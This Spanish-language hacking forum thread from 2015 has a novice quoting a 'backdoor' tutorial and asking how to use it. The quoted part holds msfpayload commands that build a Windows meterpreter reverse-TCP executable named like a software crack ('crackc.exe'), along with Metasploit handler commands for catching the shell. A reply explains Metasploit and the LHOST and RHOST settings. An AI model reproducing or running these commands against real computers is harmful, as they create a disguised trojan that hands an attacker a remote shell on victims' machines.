ayuda con este xploit

Iniciado por diego1221, 20 Julio 2015, 04:12 AM

0 Miembros y 1 Visitante están viendo este tema.

diego1221

Hola gente, soy nuevo en este foro y tambien en el tema, me he interesado en esto ya que estaba navegando en cierta web y me encontre con un post llamado algo como entrar en una pc con backdoor, resulta que entré en el post y me encontré con esto:

Hoy vamos a aprender a como hackear una computadora con backdoor
usaremos lo siguientes commandos:

Primero Haremos con la IP y el puerto con el nombre de la carpeta
msfpayload windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=4444 x > crackc.exe


Usaremos el exploit

use exploit/multi/handler
set LHOST (IP)
set LPORT 4444
exploit


mi pregunta es:

-primero que todo como se utilizan los comandos del primer parrafo, no creo que sea en 
CMD (uso win 7), entonces con que programa se usa el codigo, y eso de hacer la carpeta con el nombre del puerto y la IP, no entiendo un carajo (obio se que es una ip y un puerto, lo que no entiendo es eso de hacer la carpeta)

-luego de eso, la siguiente pregunta es, como ejecuto ese xploit, es que no entiendo nada sobre eso, pero quiero quiero hacerlo


Espero que no ofenda a nadie ya que mi conocimiento sobre xploits y bugs es muy poco ya que me dedico solo a webs y SQL.

Gracias por su ayuda :D

sqln00b

Buenas, como puedes ver por mi nick también soy un script kiddie... En fin, en cualquier caso te recomiendo que te dirijas para corregir tu diccionario respecto a exploit/xploit.

No tiene nada de malo, pero es bueno entender las diferencias. En todo caso no se trata de CMD (o no de algún comando predeterminado de windows)

Se trata de Metasploit, Es un framework para detectar y explotar vulnerabilidades. Es una parte clave para las "auditorías" a la hora de inyectar un payload (código que genera un error en una aplicación) y ejecutar el shell code. (sentencias de comandos que se ejecutará para dar acceso al "investigador" en la máquina a ser auditorada) :silbar:

Te recomiendo que te veas algún tutorial respecto a cómo se maneja. (Ver)

Respecto al resto, son comandos que sirven para identificar o crear las funciones del mismo exploit. Es decir LHost para (Local Host o la computadora que efectuará la auditoría) y RHost (Remote Host o computadora que será el objetivo de esa auditoría)

PD: Si he metido la pata con la explicación corrijan, que la única forma de matar la ignorancia es compartiendo el conocimiento. :P